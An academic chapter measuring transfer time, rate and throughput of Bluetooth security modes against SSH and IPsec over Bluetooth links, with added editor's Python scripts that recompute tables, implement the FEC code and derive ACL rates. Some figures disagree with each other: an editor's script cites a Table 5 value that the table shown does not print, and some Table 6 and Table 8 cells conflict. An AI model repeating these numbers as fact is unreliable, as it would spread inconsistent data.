An obvious choice for any Bluetooth application would be to use the Bluetooth encryption provided at the link layer. Virtually all Bluetooth devices support this feature, and it is, in most cases, considered to be adequately secure. However, this may not hold for all deployment scenarios. In order to establish a secure channel with another Bluetooth device, a preshared secret called a PIN is required, and a symmetric key is generated from this PIN. On consumer devices this PIN typically consists of four or five digits. Supposing a whole piconet would utilize this PIN to encrypt its communication, anyone acquiring this PIN could decrypt all communication; worse, because the link key is derived from the PIN together with values exchanged in the clear during pairing, an eavesdropper who records the pairing can recover a four-digit PIN by offline brute force (Shaked & Wool, 2005). On top of that, in applications like VoIP that mandate IP connectivity to access points (APs), the encryption ends at the AP, which means that the AP, or any host that can manipulate the communication between the mobile device and the other end, can expose the data (see Figure 1). Thus, Bluetooth link encryption is not well suited for all applications which may exploit Bluetooth connections.

Under these circumstances and for certain classes of security sensitive applications deployed in Bluetooth PAN networks, the investigation of complementary and advanced security protocols apart from Bluetooth's native security mechanisms, even if deployed as an interim countermeasure, is an interesting research issue. On the other hand, as Bluetooth wireless technology is targeting devices with particular needs and constraints (e.g., processing power and battery consumption), the trade-offs between security services and performance must be carefully considered. Furthermore, considering that radio links in general suffer from limited bandwidth and are unreliable by nature, performance issues must be thoroughly investigated to decide whether certain security protocols and their mechanisms are advantageous over Bluetooth connections, delivering robust and agile security services within tolerable service response times.

Figure 1. Sample scenario that mandates upper layer security



During the last few years, several researchers have examined various Bluetooth security parameters and some of them do explore performance parameters (e.g., Chakraborty, 2000; De Morais Cordeiro, Sadok, & Agrawal, 2001; Francia, Kilaru, Le Phuong, & Vashi, 2004; Golmie & Rebala, 2003; Howitt, 2002; Karnik & Kumar, 2000; Kitsos et al., 2003; Lim et al., 2001; Miorandi, Caimi, & Zanella, 2003; Wang, Arumugam, & Krishna, 2002). However, to the best of our knowledge, none of these works focuses on a performance evaluation comparing Bluetooth's native security mechanisms with well-respected, strong security protocols like IPsec and SSH.

The chapter focuses on the performance of existing protocols and mechanisms rather than on security itself, estimating the performance of both the built-in Bluetooth security mechanisms, namely the security modes, and two other standard security protocols operating at different layers of the TCP/IP protocol suite, namely SSH and IPsec. Protocols like SSH and IPsec provide robust, flexible, costless, and easy to implement solutions for exchanging data over insecure communication links. However, although their deployment is a well established and accustomed practice in the wireline world, more research effort is needed for wireless links, due to the several aforementioned limitations. Depending on the scenario involved, the user may utilize SSH or IPsec security services, either individually or in combination with the Bluetooth security modes, allowing applications to communicate securely through a secure tunnel. Thus, in a sense, the whole procedure can also be seen as the deployment of small VPNs in Bluetooth PANs. Note, however, that the efficiency of SSH and IPsec depends mainly on the performance of the end-system used, since their cryptography runs on the host CPU. On the contrary, the native Bluetooth security modes utilize the hardware encryption of the Bluetooth chip, thus their performance depends heavily on the chip per se. This situation will allow us to make several observations about security mechanisms at different layers when deployed over dissimilar user devices.

Specifically, the chapter evaluates several personal area network (PAN) parameters, including transfer times, link capacity, and throughput. The experiments employ both the Bluetooth native security mechanisms and the two aforementioned protocols. Through a plethora of scenarios, utilizing both laptops and palmtops, we intend to offer a comprehensive in-depth comparative analysis of each of the aforementioned security mechanisms when deployed over Bluetooth communication links.

The rest of the chapter is structured as follows. The next section gives an overview of our experimental test-bed related parameters and procedures, while the third section presents the derived performance measurement results. The fourth section offers an analytical discussion of the results obtained. The chapter finishes with some concluding thoughts and future directions of this work.

EXPERIMENTAL FRAMEWORK DESCRIPTION

The experimental topology consists of two pairs of machines. The first pair of Bluetooth devices employs a laptop and a palmtop machine, while the other consists of two similar laptop machines. The members of each pair are located 10 meters apart and connected via Bluetooth adapters (or a built-in Bluetooth chip), thus forming a small two-member wireless PAN (WPAN) or piconet. The main components' characteristics, both software and hardware, are presented in Table 1. To estimate the performance of the Bluetooth network, the data were transmitted from one network node (server) to the other (client). Hence, in order to record the incoming and outgoing packets between the corresponding network entities and to calculate the network performance parameters, we utilized on the server side the well known network analyzer "ethereal" (www.ethereal.com), version 0.10.12, which captures through the libpcap library also used by the "tcpdump" tool. In addition, for the Linux environment, we employed the BlueZ official Linux Bluetooth protocol stack (www.bluez.org), which provides support for the core Bluetooth layers and protocols.

Bluetooth supports three different security modes called security modes I, II, and III, but in



our tests we decided to use only security modes I and III. Security mode I offers no real security, as the authentication and confidentiality services are disabled. On the other hand, security mode II provides security services after the connection between the two devices has been established and only if a given application has requested them. Thus, the security services in mode II depend on the application running. The last security mode is the most powerful among the three because it mandates both the authentication and the confidentiality built-in mechanisms independently of the application running. These mechanisms are referred to as Bluetooth baseband security procedures: the baseband layer uses the SAFER+-based algorithms (Massey, Khachatrian, & Kuregian, 1998) for authentication and link key generation, and the E0 stream cipher, keyed from the link key, for encryption. As implied, one of the terminals was acting as a client and the other one as the server. Therefore, the server requires security and the client responds accordingly.

For IPsec, the engaged machines must have the same security policies in order to communicate securely. So, we configured Linux on both machines to use the MD5 and SHA1 algorithms for data integrity and the DES and 3DES algorithms for confidentiality, by installing IPsec-tools (http://ipsec-tools.sourceforge.net/) and Openswan (www.openswan.org). For SSH secured communication we used OpenSSH. In fact, many open-source projects exist. In addition to FreeS/WAN and Openswan, which both enable IPsec in the Linux kernel, OpenVPN (http://openvpn.net/) can be used to create TLS-encrypted point-to-point connections. For SSH confidentiality services we chose four algorithms to test, namely 3DES, AES, Arcfour, and Blowfish. Finally, for both IPsec and SSH we employed only symmetric cryptography and manual keying procedures for the authentication of the parties, considering the fact that Bluetooth piconets are usually formed ad hoc and their users do not hold public key certificates. Note that single DES, Arcfour (RC4), and MD5 serve here as performance data points only; none of them is acceptable for a new deployment, and manual keying means the shared keys must be distributed out of band and rotated by hand.

PERFORMANCE MEASURES

As mentioned before, the experimental procedure consists of three main parts: evaluation of the Bluetooth built-in security modes I (no security) and III

Table 1. Hardware and software characteristics of the engaged machines

First pair

  Laptop server
    Processor:          Intel Celeron M, 1.4 GHz
    RAM:                256 MB
    Operating system:   SUSE Linux ver. 10.0
    Bluetooth adapter:  Trust Bluetooth adapter, Class 1

  Palmtop client
    Model:              HP iPAQ h540
    Processor:          400 MHz Intel XScale PXA250
    RAM:                64 MB
    Operating system:   Familiar PDA OS 0.8.4
    Bluetooth adapter:  Bluetooth 1.1 compliant

Second pair

  Laptop client and server
    Processor:          Intel Celeron M, 1.4 GHz
    RAM:                256 MB
    Operating system:   SUSE Linux ver. 10.0
    Bluetooth adapter:  Trust Bluetooth adapter, Class 1



(strong security), and estimation of the performance of the IPsec and SSH mechanisms over Bluetooth links. In all scenarios we gathered measurements for the following network performance parameters: absolute file transfer time (TT), achieved transfer rate (ATR), and throughput (THR). All measurements took place at the server node because of its processing power.

• The Transfer_Time (TT) represents the actual duration of the transfer during a transaction, in seconds, including any handshake performed at its start.
• The Achieved_Transfer_Rate (ATR) represents the actual transfer rate achieved during a transaction. In an ideal scenario, a constant data rate would be maintained between the two communication end-points. However, for various reasons, mainly related to the nature of the wireless medium, this parameter changes over time. We should underline the fact that bytes_sent and bytes_received may also contain retransmitted bytes, so ATR measures link utilization rather than goodput:
  Achieved_Transfer_Rate (Kbps) = ((bytes_sent + bytes_received) * 8) / (TT * 1000)
• Throughput represents the percentage of the Achieved_Transfer_Rate over the practical maximum_transfer_rate of the link, which in our case is 723 Kbps:
  Throughput (%) = Achieved_Transfer_Rate / max_transfer_rate * 100
• Finally, Achieved_Transfer_Rate_Improvement is a comparison metric that indicates the improvement of the Achieved_Transfer_Rate with respect to the Bluetooth mode I achieved transfer rate Achieved_Transfer_Rate_B_I and is calculated as:
  Achieved_Transfer_Rate_Improvement (%) = (ATR - ATR_B_I) / ATR_B_I * 100

A positive value implies that the performance (or channel throughput) has increased compared to the Bluetooth mode I achieved transfer rate, while a negative one means that the performance has

Figure 2. Average metric values for network parameters measured, Bluetooth modes I and III (three plots against file size, each with a Mode I and a Mode III series: transfer times (TT) in seconds, throughput (THR) in percent, and achieved transfer rate (ATR) in Kbps)

decreased. Measurements were gathered during repeated FTP file transfers, between the laptop server and the PDA client on the one hand and between the laptop client and server on the other. Each file was transferred twelve times and only the average values were recorded. In all scenarios, the ping response times between client and server varied between 19.7 and 21.8 msecs. Due to space limitations, in the first three subsections that follow we present only the analytical results derived from the laptop server/PDA client pair, which is without doubt the most interesting one, while some indicative corresponding comparisons with the other laptop client-server pair are exhibited in the subsection titled "Comparison Between PDA and Laptop Clients."

Bluetooth Security Modes I and III Evaluation

Measurements for testing Bluetooth modes I and III were gathered by transferring four different files between each client-server pair. The files' sizes were 5.26, 7.0, 10.5, and 15 Mbytes, respectively. Figure 2 provides a graphical representation of these values, comparing the TT times achieved in the PDA client-laptop server piconet. As we can easily notice, the results are generally as expected, but there are some interesting points which need further analysis. At first, the TT metric is slightly higher for mode III, while the ATR is higher for mode I. This happens because mode III mandates authentication (handshake) at the beginning of each transaction; keep in mind that the handshake time is included in TT too. Moreover, encryption is applied during the transaction for mode III and as a result the overall transfer time is increased. We can also perceive that the larger the file size is, the longer the TT difference between mode I and mode III is expected to be. This situation is also depicted in the respective plot of Figure 2. In general, these measurements indicate that mode I utilizes the network better than mode III. Because of the volatile nature of the wireless link, we also report the standard deviation (SD) of the measured values in Table 2.

Table 2. Standard deviation for all Bluetooth scenarios

                 Mode I                          Mode III
File size (MB)   TT (sec)  ATR (Kbps)  THR (%)   TT (sec)  ATR (Kbps)  THR (%)
5.26             0.5       2.6         0.4       0.1       1.3         0.2
7                0.1       0.9         0.1       0.5       3.2         0.4
10.5             0.4       1.6         0.2       0.1       0.5         0.1
15               0.2       0.5         0.1       0.6       2.2         0.3

Secure Shell (SSH) Evaluation

Experimental procedures for the SSH mechanism (IETF, 2006; OpenSSH, 2006) consider the transfer of the same four files, as before, between the client and the server. Table 3 displays the average values of all metrics used, while Table 4 presents the corresponding standard deviation values.

As we can notice, SSH gives highly increased transfer times when compared to the Bluetooth security modes. For instance, we can spot a difference of +12.6 seconds to +13.4 seconds for the smallest file, depending on the cipher used. Moreover, it is more than obvious that all the ciphers used perform more or less the same. This is easily seen if we examine, for example, the achieved transfer rates in each case, which show only very slight differences: on a 1.4 GHz host the bottleneck is the 723 Kbps link, not the cipher, so the choice of cipher should be driven by its security properties rather than by speed.

Another interesting observation is that as the size of the file increases, the achieved transfer rate and the throughput become larger. This happens because the authentication procedure, which takes place during the initial SSH handshake, is a fixed cost that is amortized over a longer transfer. In any case it should be noted that the improvement in the achieved transfer rate induced by SSH, always compared to Bluetooth security mode I, is negative for every scenario. This means that Bluetooth's native mechanisms offer better bandwidth and network utilization in almost all cases examined. This remark is confirmed by the values given in Table 5.

Table 3. Average values for network parameters measured (SSH)

            5.26 MB                         7 MB
            TT (sec)  ATR (Kbps)  THR (%)   TT (sec)  ATR (Kbps)  THR (%)
3DES        90.1      526.4       72.8      116.9     555.6       76.9
AES128      90.2      525.6       72.7      116.9     556.2       76.9
Arcfour     90.5      523.8       72.5      117.3     554.2       76.6
Blowfish    90.5      523.6       72.4      117.6     552.8       76.4

            10.5 MB                         15 MB
            TT (sec)  ATR (Kbps)  THR (%)   TT (sec)  ATR (Kbps)  THR (%)
3DES        163.0     581.8       80.5      221.3     603.2       83.4
AES128      162.9     582.4       80.5      221.3     603.6       83.5
Arcfour     163.1     581.6       80.5      221.6     602.4       83.3
Blowfish    162.8     582.6       80.6      222.1     601.2       83.1

Table 4. Standard deviation for all SSH scenarios

            5.26 MB                         7 MB
            TT (sec)  ATR (Kbps)  THR (%)   TT (sec)  ATR (Kbps)  THR (%)
3DES        0.4       2.1         0.3       0.4       2.1         0.3
AES128      0.9       5.5         0.7       0.4       1.9         0.2
Arcfour     0.1       0.4         0.1       0.2       1.1         0.2
Blowfish    0.6       3.8         0.5       1.0       4.9         0.7

            10.5 MB                         15 MB
            TT (sec)  ATR (Kbps)  THR (%)   TT (sec)  ATR (Kbps)  THR (%)
3DES        1.0       3.3         0.5       0.8       2.5         0.3
AES128      1.0       3.9         0.5       0.9       2.3         0.3
Arcfour     0.5       1.9         0.3       0.6       1.7         0.2
Blowfish    0.6       1.9         0.3       0.7       1.9         0.3

IPsec Evaluation

The procedure for the IPsec protocol (Kent & Atkinson, 1998a, 1998b) considers once again the transfer of the same four files between the client and the server. IPsec uses two mechanisms (protocols) that may be used independently or jointly to secure the outgoing traffic, namely the authentication header (AH), offering data origin, connectionless

Table 5. ATR deterioration (%) of each SSH cipher relative to Bluetooth mode I

File size (MB)   Bluetooth mode I ATR (Kbps)   3DES    AES128   RC4     Blowfish
5.26             618.0                         -14.8   -15.0    -15.2   -15.3
7                620.2                         -10.4   -10.4    -10.6   -10.9
10.5             621.2                         -6.3    -6.2     -6.4    -6.2
15               621.4                         -2.9    -2.9     -3.3    -3.3


Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

data integrity, and optionally replay protection, and encapsulating security payload (ESP) offering confidentiality and protection against traffic analysis. In our scenarios we utilized both mechanisms, using the MD5 and SHA1 algorithms for integrity and DES and 3DES to support confidentiality services. Note however that MD5 is not considered secure anymore and is reported here for the sake of completeness. In total, we deployed six scenarios as shown in Table 6.

First and foremost, all network metrics for IPsec are remarkably concentrated. Standard deviation values rendered in Table 7 confirm this remark.

Table 6. Average values for network parameters measured (IPsec)

                 5.26 MB                        7 MB
                 TT (sec)  ATR (Kbps)  THR (%)  TT (sec)  ATR (Kbps)  THR (%)
AH_MD5           72.8      683.4       94.5     100.0     682.8       94.4
AH_SHA1          72.8      683.2       94.5     99.9      683.0       94.5
ESP_DES_MD5      74.4      681.0       95.0     102.0     686.6       95.0
ESP_3DES_MD5     73.8      681.0       95.7     102.2     685.2       94.8
ESP_DES_SHA1     74.2      680.0       95.2     102.0     686.6       95.0
ESP_3DES_SHA1    74.2      681.0       95.2     101.8     688.2       95.2

                 10.5 MB                        15 MB
                 TT (sec)  ATR (Kbps)  THR (%)  TT (sec)  ATR (Kbps)  THR (%)
AH_MD5           145.9     682.6       94.4     205.2     683.4       94.5
AH_SHA1          145.7     683.4       94.5     205.1     683.8       94.6
ESP_DES_MD5      148.6     688.2       95.2     208.9     688.8       95.3
ESP_3DES_MD5     148.6     687.8       95.1     209.1     688.0       95.2
ESP_DES_SHA1     148.5     688.4       95.2     209.2     688.0       95.2
ESP_3DES_SHA1    148.6     688.0       95.2     210.5     683.6       94.6

Table 7. Standard deviation of measurements of all IPsec scenarios

                 5.26 MB                        7 MB
                 TT (sec)  ATR (Kbps)  THR (%)  TT (sec)  ATR (Kbps)  THR (%)
AH_MD5           0.0       0.5         0.05     0.1       0.8         0.12
AH_SHA1          0.1       0.4         0.1      0.1       0.0         0.05
ESP_DES_MD5      0.1       0.4         0.1      0.3       2.1         0.28
ESP_3DES_MD5     0.5       4.5         0.6      1.3       8.6         1.19
ESP_DES_SHA1     0.0       0.4         0.06     0.6       3.7         0.53
ESP_3DES_SHA1    0.0       0.4         0.06     0.1       0.4         0.1

                 10.5 MB                        15 MB
                 TT (sec)  ATR (Kbps)  THR (%)  TT (sec)  ATR (Kbps)  THR (%)
AH_MD5           0.1       0.5         0.06     0.2       0.5         0.08
AH_SHA1          0.2       0.9         0.1      0.1       0.4         0.03
ESP_DES_MD5      0.1       0.8         0.09     0.1       0.4         0.04
ESP_3DES_MD5     0.1       0.8         0.08     0.1       0.0         0.03
ESP_DES_SHA1     0.0       0.5         0.02     0.3       1.0         0.13
ESP_3DES_SHA1    0.1       0.7         0.06     2.4       7.6         1.05
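The "% ATR deterioration" of Table 5 and the "% ATR improvement" of Table 8 are plain percent changes of a scenario's ATR against the Bluetooth mode I ATR at the same file size, and the THR column of Tables 3 and 6 is the ATR expressed as a share of the 723.2 kbps theoretical DH5 forward rate listed in Table 9. The Python script below is an added editor's example, not code from the chapter; it copies the ATR figures printed in Tables 3 and 6 and recomputes both percentage tables so the printed cells can be checked. Doing so reproduces Table 5 to within rounding except for the Blowfish/10.5 MB cell (582.6 Kbps against 621.2 Kbps gives -6.2, not the printed -11.0), and reproduces the AH columns and the 10.5 and 15 MB rows of Table 8; the ESP cells of Table 8's 5.26 MB row (and ESP_3DES_MD5 at 7 MB) do not follow from the Table 6 ATR values, whose THR entries for that row are likewise inconsistent with the same ATR, so those cells cannot be verified from the page.

```python
"""Recompute the % ATR columns of Tables 5 and 8 and the THR column of Tables 3 and 6.

Editor's example; every figure below is copied from the chapter's tables.
"""

# Bluetooth security mode I ATR (Kbps) per file size (MB): the baseline column of Tables 5 and 8.
MODE_I_ATR = {5.26: 618.0, 7: 620.2, 10.5: 621.2, 15: 621.4}

# ATR (Kbps) per scenario and file size, from Table 3 (SSH) and Table 6 (IPsec).
SSH_ATR = {
    "3DES":     {5.26: 526.4, 7: 555.6, 10.5: 581.8, 15: 603.2},
    "AES128":   {5.26: 525.6, 7: 556.2, 10.5: 582.4, 15: 603.6},
    "Arcfour":  {5.26: 523.8, 7: 554.2, 10.5: 581.6, 15: 602.4},
    "Blowfish": {5.26: 523.6, 7: 552.8, 10.5: 582.6, 15: 601.2},
}
IPSEC_ATR = {
    "AH_MD5":        {5.26: 683.4, 7: 682.8, 10.5: 682.6, 15: 683.4},
    "AH_SHA1":       {5.26: 683.2, 7: 683.0, 10.5: 683.4, 15: 683.8},
    "ESP_DES_MD5":   {5.26: 681.0, 7: 686.6, 10.5: 688.2, 15: 688.8},
    "ESP_3DES_MD5":  {5.26: 681.0, 7: 685.2, 10.5: 687.8, 15: 688.0},
    "ESP_DES_SHA1":  {5.26: 680.0, 7: 686.6, 10.5: 688.4, 15: 688.0},
    "ESP_3DES_SHA1": {5.26: 681.0, 7: 688.2, 10.5: 688.0, 15: 683.6},
}

# Table 5 as printed (its "RC4" column is the Arcfour cipher of Table 3).
PRINTED_TABLE_5 = {
    "3DES":     {5.26: -14.8, 7: -10.4, 10.5: -6.3,  15: -2.9},
    "AES128":   {5.26: -15.0, 7: -10.4, 10.5: -6.2,  15: -2.9},
    "Arcfour":  {5.26: -15.2, 7: -10.6, 10.5: -6.4,  15: -3.3},
    "Blowfish": {5.26: -15.3, 7: -10.9, 10.5: -11.0, 15: -3.3},
}

# Theoretical forward rate of a DH5 ACL link (Table 9); THR in Tables 3 and 6 is ATR relative to it.
DH5_ASYMMETRIC_KBPS = 723.2


def atr_change_pct(atr_kbps, file_mb):
    """Percent change of a scenario's ATR against Bluetooth mode I at the same file size."""
    baseline = MODE_I_ATR[file_mb]
    return round((atr_kbps - baseline) / baseline * 100, 1)


def throughput_pct(atr_kbps):
    """THR column: achieved rate as a percentage of the DH5 theoretical limit."""
    return round(atr_kbps / DH5_ASYMMETRIC_KBPS * 100, 1)


def change_table(scenarios):
    """Map scenario -> {file size: % ATR change}; negative values are deteriorations."""
    return {name: {mb: atr_change_pct(atr, mb) for mb, atr in per_size.items()}
            for name, per_size in scenarios.items()}


def compare_with_printed(computed, printed, tolerance=0.25):
    """List (scenario, file size, computed, printed) for cells differing by more than tolerance."""
    return [(name, mb, computed[name][mb], printed[name][mb])
            for name in printed for mb in printed[name]
            if abs(computed[name][mb] - printed[name][mb]) > tolerance]


if __name__ == "__main__":
    for name, row in change_table(SSH_ATR).items():
        print("SSH  ", name, row)
    for name, row in change_table(IPSEC_ATR).items():
        print("IPsec", name, row)
    print("Table 5 cells that do not reproduce:",
          compare_with_printed(change_table(SSH_ATR), PRINTED_TABLE_5))
    print("THR for 683.4 Kbps:", throughput_pct(683.4))
```

Running it prints the recomputed rows and a one-entry mismatch list for Table 5; the same `compare_with_printed` can be pointed at a transcription of Table 8 to locate its inconsistent cells.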


Surprisingly, IPsec gives better transfer times for all file sizes when compared to Bluetooth and SSH. This is also confirmed by the % ATR improvement for IPsec shown in Table 8. In particular, all IPsec times are very close to those of Bluetooth's mode I, while at the same time they are considerably better than SSH's. Note that IPsec renders 210.5 seconds as the highest time duration for transferring the biggest file, while correspondingly SSH gives 222.1 seconds, mode III produces 213.2 seconds, and mode I 211.6 seconds. This is partially due to the substantially increased (and highly stabilized) bandwidth that IPsec generates. The aforementioned observations are also confirmed by the fact that during IPsec measurements we had a very low rate of packet loss reported by the Ethereal utility. It is important to note that the throughput was better when using ESP. On the contrary, when using AH, the throughput for transferring the files was lower. This can be explained by the fact that authentication is applied in AH.

Table 8. % ATR improvement for IPsec

File Size (MB)  Bluetooth Mode I ATR (Kbps)  AH_MD5  AH_SHA1  ESP_DES_MD5  ESP_DES_SHA1  ESP_3DES_MD5  ESP_3DES_SHA1
5.26            618.0                        10.6    10.6     11.1         11.4          11.9          11.4
7               620.2                        10.1    10.1     10.7         10.7          11.5          11.0
10.5            621.2                        9.9     10.0     10.8         10.8          10.7          10.8
15              621.4                        10.0    10.0     10.8         10.7          10.7          10.0

Comparison between PDA and Laptop Clients

Considering the second experimental pair, which employs laptops for both the server and the client (see Table 1), TT times were better for all the corresponding scenarios, namely Bluetooth native security modes, SSH and IPsec. For instance, Bluetooth modes show a slight TT improvement ranging from 1 to 3 seconds depending on the file size. Specifically, TT for the 7 MB file was 102.8 and 106.5 for Bluetooth mode I and III, respectively. Approximately the same situation is reported for SSH and IPsec as depicted in Figure 3. This fact is expected as the laptop client incorporates a faster CPU and thus gains more in the cryptographic operations that SSH and IPsec mandate. The same remark applies to the other two network performance parameters, throughput and ATR. As in the PDA client case, IPsec continues to perform better under all circumstances for the laptop client due to its throughput optimization. However, IPsec

Figure 3. Comparison of network transfer times between Laptop and PDA clients (two bar charts, y-axis in seconds, series "Laptop client" and "PDA client": "SSH transfer time (7 MB)" over DES, AES, Arcfour, Blowfish; "IPsec transfer time (7 MB)" over AH_MD5, AH_SHA1, ESP_DES_MD5, ESP_DES_SHA1, ESP_3DES_MD5, ESP_3DES_SHA1)

TT times remain very close to those of the Bluetooth security modes. The same situation is confirmed by the minimum standard deviation values that characterize the IPsec case. Also in this case, SSH gives the worst performance compared with IPsec and the Bluetooth native security modes.

Comments on the Results

This section provides a comparative view of the conducted results. Also, we attempt to provide a better explanation of the experiment outcomes. But before that we must shortly discuss important characteristics of Bluetooth connections that may affect the performance of the connection. Bluetooth employs frequency hopping spread spectrum (FHSS) to avoid interference. There are 79 hopping frequencies (23 in some countries), each having a bandwidth of 1 MHz. Frequency hopping is assisted with fast automatic repeat request (ARQ), cyclic redundancy check (CRC), and forward error correction (FEC) to achieve high reliability on the wireless links. All the data/control packet transmissions are synchronized by the master. Slave units can only send in the slave-to-master slot after being addressed in the preceding master-to-slave slot, with each slot lasting 625 microseconds.

For real-time data such as video, synchronous connection oriented (SCO) links are used, while for data transmission, asynchronous connectionless (ACL) links are employed. There are several ACL packet types, differing in packet length and whether they are FEC coded or not. The FEC coding scheme used in ACL DM mode is a shortened Hamming code, where each block of 10 information bits is encoded into a 15 bit codeword, and is capable of correcting a single bit error in each block. Table 9 shows the different ACL packet types and their properties. The values in the table are theoretical, without packet overhead. For example, over an ACL link using DH5, one can send about 300 to 320 kbit/s of UDP user data, while the theoretical limit is 433.9 kbit/s.

This means that in order to overcome the effect of low and varying link quality on throughput, the selection of the optimal link layer packet size, under estimated channel conditions, is crucial. Indeed some research work (Chen, Kapoor, Sanadidi, & Gerla, 2004) points this out by evaluating the "optimal" link layer packet size based on the current bit error rate of the channel. Moreover, in regions where Wi-Fi networks coexist with Bluetooth, and because Wi-Fi and Bluetooth utilize the spectrum in different ways, they can cause considerable interference to each other (depending on the relative location of the 802.11b and Bluetooth devices) (Yip & Kwok, 2004). By transmitting at the highest power level, Bluetooth class 1 devices would create more interference than Bluetooth's class 2 and class 3 devices, which transmit at lower power levels. Furthermore, because each Bluetooth PAN will occupy the entire ISM band, two or more coexisting Bluetooth PANs will occasionally collide, possibly causing loss of data packets. Of course, apart from implementation issues (e.g., protocol stacks), the aforementioned parameters are closely related and can affect real Bluetooth connections and the results gathered in this chapter. For instance, all experiments were conducted inside the coverage area of the University's hot-spot.
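The 2/3-rate FEC of the DM packet types is the (15,10) shortened Hamming code of the Bluetooth baseband, whose generator polynomial is g(D) = D^5 + D^4 + D^2 + 1. The Python below is an added editor's example, not code from the chapter: it implements the systematic encoder and a syndrome decoder that corrects any single bit error per 15-bit block and rejects blocks whose syndrome matches no single-bit pattern (which is what the baseband does with a double error: the packet fails and ARQ retransmits it). The `coded_bits` helper and its whole-block padding are a simplification added for illustration; the real baseband also codes the payload header and CRC.

```python
"""Bluetooth 2/3-rate FEC: the (15,10) shortened Hamming code used for DM-type ACL payloads.

Editor's example, not the chapter's code. The generator polynomial g(D) = D^5 + D^4 + D^2 + 1
is the one the Bluetooth baseband specification gives for this code.
"""
import math

GEN = 0b110101   # g(D) = D^5 + D^4 + D^2 + 1 as a bit pattern (bit 5 is the D^5 term)
K, N = 10, 15    # 10 information bits -> 15-bit codeword, i.e. rate 2/3
PARITY = N - K   # 5 parity bits


def poly_mod(value, width):
    """Remainder of a GF(2) polynomial of at most `width` bits after division by GEN."""
    for i in range(width - 1, PARITY - 1, -1):
        if (value >> i) & 1:
            value ^= GEN << (i - PARITY)   # cancel the leading term
    return value


def fec_encode(info):
    """Systematic encoding: codeword = info*D^5 + (info*D^5 mod g); info sits in the top 10 bits."""
    if not 0 <= info < (1 << K):
        raise ValueError("info must fit in 10 bits")
    shifted = info << PARITY
    return shifted | poly_mod(shifted, N)


# Syndrome of every single-bit error pattern, computed once: 15 distinct non-zero values.
SINGLE_ERROR_SYNDROMES = {poly_mod(1 << pos, N): pos for pos in range(N)}


def fec_decode(word):
    """Decode a 15-bit received word.

    Returns (info, corrected_bit): corrected_bit is None for a clean word, the bit index for a
    corrected single error, and -1 (with info None) when the syndrome matches no single-bit
    pattern, i.e. an uncorrectable (for instance double) error that the receiver must reject."""
    syndrome = poly_mod(word, N)
    if syndrome == 0:
        return word >> PARITY, None
    pos = SINGLE_ERROR_SYNDROMES.get(syndrome)
    if pos is None:
        return None, -1
    return (word ^ (1 << pos)) >> PARITY, pos


def coded_bits(payload_bytes):
    """Air-interface bits needed to carry `payload_bytes` through the 2/3 FEC.
    Simplification: the payload is padded to whole 10-bit blocks and header/CRC are ignored."""
    return math.ceil(payload_bytes * 8 / K) * N


if __name__ == "__main__":
    info = 0b1011001101
    cw = fec_encode(info)
    print(f"codeword {cw:015b}")
    print("single error corrected:", fec_decode(cw ^ (1 << 7)))
    print("double error rejected: ", fec_decode(cw ^ 0b11))
    print("a 17-byte DM1 payload needs", coded_bits(17), "coded bits")
```

Because the code has minimum distance 4, the sum of any two single-error syndromes is never itself a single-error syndrome, so a double error is always detected rather than miscorrected; that is the property the decoder's `None` branch relies on.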

Table 9. Packet types for Bluetooth ACL connections (theoretical values)

Mode  FEC  Packet Size (bytes)  Symmetric (kbps)  Asymmetric forward (kbps)  Asymmetric reverse (kbps)
DM1   2/3  0-17                 108.8             108.8                      108.8
DM3   2/3  0-121                258.1             387.2                      54.4
DM5   2/3  0-227                286.7             477.8                      36.3
DH1   no   0-27                 172.8             172.8                      172.8
DH3   no   0-183                390.4             585.6                      86.4
DH5   no   0-339                433.9             723.2                      57.6
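Every rate in Table 9 follows from the slot structure described above: a packet occupies 1, 3 or 5 slots of 625 microseconds, the symmetric rate assumes the same packet type in both directions, and the asymmetric rates assume a 1-slot packet of the same family (DM1 or DH1) on the return path. The Python below is an added editor's example, not the chapter's code, that re-derives the table from those rules; the payload maxima are the Bluetooth 1.2 baseband values, and note that the 286.7 kbps printed for DM5 corresponds to its 224-byte maximum payload rather than the 227 printed in the size column (the DM5 asymmetric forward figure rounds to 477.9; the table prints 477.8).

```python
"""Re-derive the theoretical ACL data rates of Table 9 from the Bluetooth slot structure.

Editor's example, not the chapter's code. Payload maxima are Bluetooth 1.2 baseband values.
"""

SLOT_MS = 0.625  # one baseband slot, 625 microseconds

# packet type -> (max user payload in bytes, slots occupied, FEC-coded?)
ACL_TYPES = {
    "DM1": (17, 1, True),
    "DM3": (121, 3, True),
    "DM5": (224, 5, True),
    "DH1": (27, 1, False),
    "DH3": (183, 3, False),
    "DH5": (339, 5, False),
}


def rate_kbps(payload_bytes, slots_per_cycle):
    """User data rate when `payload_bytes` are delivered once every `slots_per_cycle` slots.
    Bits per millisecond equal kbit/s, so no further unit conversion is needed."""
    return round(payload_bytes * 8 / (slots_per_cycle * SLOT_MS), 1)


def acl_rates(packet_type):
    """Return (symmetric, asymmetric forward, asymmetric reverse) kbps for one ACL packet type.

    Symmetric: both directions use this packet type, so a cycle is two such packets.
    Asymmetric: this packet one way and the 1-slot packet of the same family back, so a cycle
    is `slots + 1` slots; the reverse direction only carries that 1-slot packet's payload."""
    payload, slots, fec = ACL_TYPES[packet_type]
    reverse_payload = ACL_TYPES["DM1" if fec else "DH1"][0]
    symmetric = rate_kbps(payload, 2 * slots)
    forward = rate_kbps(payload, slots + 1)
    reverse = rate_kbps(reverse_payload, slots + 1)
    return symmetric, forward, reverse


def link_efficiency_pct(observed_kbps, packet_type):
    """Share of the symmetric theoretical limit that an observed user-data rate achieves."""
    return round(observed_kbps / acl_rates(packet_type)[0] * 100, 1)


if __name__ == "__main__":
    for name in ACL_TYPES:
        print(name, acl_rates(name))
    # The chapter's 300-320 kbit/s of UDP data over DH5 is roughly 70% of the 433.9 kbit/s limit.
    print("DH5 efficiency at 310 kbit/s:", link_efficiency_pct(310, "DH5"), "%")
```

The same arithmetic explains the THR column of Tables 3 and 6: 723.2 kbps, the DH5 forward rate with a DH1 acknowledgement slot, is the denominator those percentages are taken against.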

